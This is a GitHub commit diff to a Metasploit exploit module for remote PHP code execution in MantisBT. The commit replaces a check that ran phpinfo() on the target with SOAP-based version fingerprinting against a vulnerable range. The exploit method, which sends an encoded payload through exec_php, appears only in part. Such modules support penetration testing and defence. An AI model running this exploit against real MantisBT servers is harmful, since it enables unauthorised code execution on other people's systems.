Skip to content

Commit eaad4e0

Browse files
firefartfirefart
committed
fix check method
1 parent 862af07 commit eaad4e0

File tree

1 file changed

+49
-4
lines changed

1 file changed

+49
-4
lines changed

modules/exploits/multi/http/mantisbt_php_exec.rb

Lines changed: 49 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -9,6 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
99
Rank = GreatRanking
1010

1111
include Msf::Exploit::Remote::HttpClient
12+
include REXML
1213

1314
def initialize(info = {})
1415
super(update_info(info,
@@ -48,13 +49,56 @@ def initialize(info = {})
4849
], self.class)
4950
end
5051

52+
def get_mantis_version
53+
xml = Document.new
54+
xml.add_element(
55+
"soapenv:Envelope",
56+
{
57+
'xmlns:xsi' => "http://www.w3.org/2001/XMLSchema-instance",
58+
'xmlns:xsd' => "http://www.w3.org/2001/XMLSchema",
59+
'xmlns:soapenv' => "http://schemas.xmlsoap.org/soap/envelope/",
60+
'xmlns:man' => "http://futureware.biz/mantisconnect"
61+
})
62+
xml.root.add_element("soapenv:Header")
63+
xml.root.add_element("soapenv:Body")
64+
body = xml.root.elements[2]
65+
body.add_element("man:mc_version",
66+
{ 'soapenv:encodingStyle' => "http://schemas.xmlsoap.org/soap/encoding/" }
67+
)
68+
69+
res = send_request_cgi({
70+
'method' => 'POST',
71+
'uri' => normalize_uri(target_uri.path, 'api', 'soap', 'mantisconnect.php'),
72+
'ctype' => 'text/xml; charset=UTF-8',
73+
'headers' => { 'SOAPAction' => 'http://www.mantisbt.org/bugs/api/soap/mantisconnect.php/mc_version'},
74+
'data' => xml.to_s
75+
})
76+
if res && res.code == 200
77+
match = res.body.match(/<ns1:mc_versionResponse><return xsi:type="xsd:string">(.+)<\/return><\/ns1:mc_versionResponse>/)
78+
if match && match.length == 2
79+
version = match[1]
80+
print_status("Detected Mantis version #{version}")
81+
return version
82+
end
83+
end
84+
85+
print_status("Can not detect Mantis version")
86+
return nil
87+
end
88+
5189
def check
52-
res = exec_php('phpinfo(); die();', true)
90+
version = get_mantis_version
91+
92+
return Exploit::CheckCode::Unknown if version.nil?
93+
94+
gem_version = Gem::Version.new(version)
95+
gem_version_introduced = Gem::Version.new('1.2.0a3')
96+
gem_version_fixed = Gem::Version.new('1.2.18')
5397

54-
if res && res.body && res.body.include?('This program makes use of the Zend')
55-
return Exploit::CheckCode::Vulnerable
98+
if gem_version < gem_version_fixed && gem_version >= gem_version_introduced
99+
return Msf::Exploit::CheckCode::Appears
56100
else
57-
return Exploit::CheckCode::Unknown
101+
return Msf::Exploit::CheckCode::Safe
58102
end
59103
end
60104

@@ -317,6 +361,7 @@ def exec_php(php_code, is_check = false)
317361
end
318362

319363
def exploit
364+
get_mantis_version
320365
unless exec_php(payload.encoded)
321366
fail_with(Failure::Unknown, 'Exploit failed, aborting.')
322367
end

0 commit comments

Comments
 (0)